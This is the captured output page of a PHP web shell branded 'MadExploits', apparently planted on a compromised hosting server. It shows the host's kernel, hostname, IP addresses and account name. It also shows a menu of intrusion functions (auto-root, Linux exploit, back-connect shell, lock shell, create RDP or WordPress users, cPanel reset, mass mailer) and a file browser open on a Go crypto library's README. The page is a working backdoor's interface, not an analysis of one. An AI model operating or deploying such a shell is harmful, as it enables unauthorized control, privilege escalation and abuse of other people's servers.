Linux id-dci-web1412.main-hosting.eu 5.14.0-611.20.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jan 14 06:35:04 EST 2026 x86_64
LiteSpeed
: 2a02:4780:6:1512:0:19fc:adf1:2 | : 216.73.216.85
Cant Read [ /etc/named.conf ]
8.1.34
u435990001
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
go /
pkg /
mod /
golang.org /
x /
crypto@v0.18.0 /
[ HOME SHELL ]
Name
Size
Permission
Action
acme
[ DIR ]
dr-xr-xr-x
argon2
[ DIR ]
dr-xr-xr-x
bcrypt
[ DIR ]
dr-xr-xr-x
blake2b
[ DIR ]
dr-xr-xr-x
blake2s
[ DIR ]
dr-xr-xr-x
blowfish
[ DIR ]
dr-xr-xr-x
bn256
[ DIR ]
dr-xr-xr-x
cast5
[ DIR ]
dr-xr-xr-x
chacha20
[ DIR ]
dr-xr-xr-x
chacha20poly1305
[ DIR ]
dr-xr-xr-x
cryptobyte
[ DIR ]
dr-xr-xr-x
curve25519
[ DIR ]
dr-xr-xr-x
ed25519
[ DIR ]
dr-xr-xr-x
hkdf
[ DIR ]
dr-xr-xr-x
internal
[ DIR ]
dr-xr-xr-x
md4
[ DIR ]
dr-xr-xr-x
nacl
[ DIR ]
dr-xr-xr-x
ocsp
[ DIR ]
dr-xr-xr-x
openpgp
[ DIR ]
dr-xr-xr-x
otr
[ DIR ]
dr-xr-xr-x
pbkdf2
[ DIR ]
dr-xr-xr-x
pkcs12
[ DIR ]
dr-xr-xr-x
poly1305
[ DIR ]
dr-xr-xr-x
ripemd160
[ DIR ]
dr-xr-xr-x
salsa20
[ DIR ]
dr-xr-xr-x
scrypt
[ DIR ]
dr-xr-xr-x
sha3
[ DIR ]
dr-xr-xr-x
ssh
[ DIR ]
dr-xr-xr-x
tea
[ DIR ]
dr-xr-xr-x
twofish
[ DIR ]
dr-xr-xr-x
x509roots
[ DIR ]
dr-xr-xr-x
xtea
[ DIR ]
dr-xr-xr-x
xts
[ DIR ]
dr-xr-xr-x
.gitattributes
345
B
-r--r--r--
.gitignore
85
B
-r--r--r--
CONTRIBUTING.md
913
B
-r--r--r--
LICENSE
1.44
KB
-r--r--r--
PATENTS
1.27
KB
-r--r--r--
README.md
896
B
-r--r--r--
codereview.cfg
21
B
-r--r--r--
go.mod
190
B
-r--r--r--
go.sum
616
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# Go Cryptography [](https://pkg.go.dev/golang.org/x/crypto) This repository holds supplementary Go cryptography libraries. ## Download/Install The easiest way to install is to run `go get -u golang.org/x/crypto/...`. You can also manually git clone the repository to `$GOPATH/src/golang.org/x/crypto`. ## Report Issues / Send Patches This repository uses Gerrit for code changes. To learn how to submit changes to this repository, see https://golang.org/doc/contribute.html. The main issue tracker for the crypto repository is located at https://github.com/golang/go/issues. Prefix your issue with "x/crypto:" in the subject line, so it is easy to find. Note that contributions to the cryptography package receive additional scrutiny due to their sensitive nature. Patches may take longer than normal to receive feedback.
Close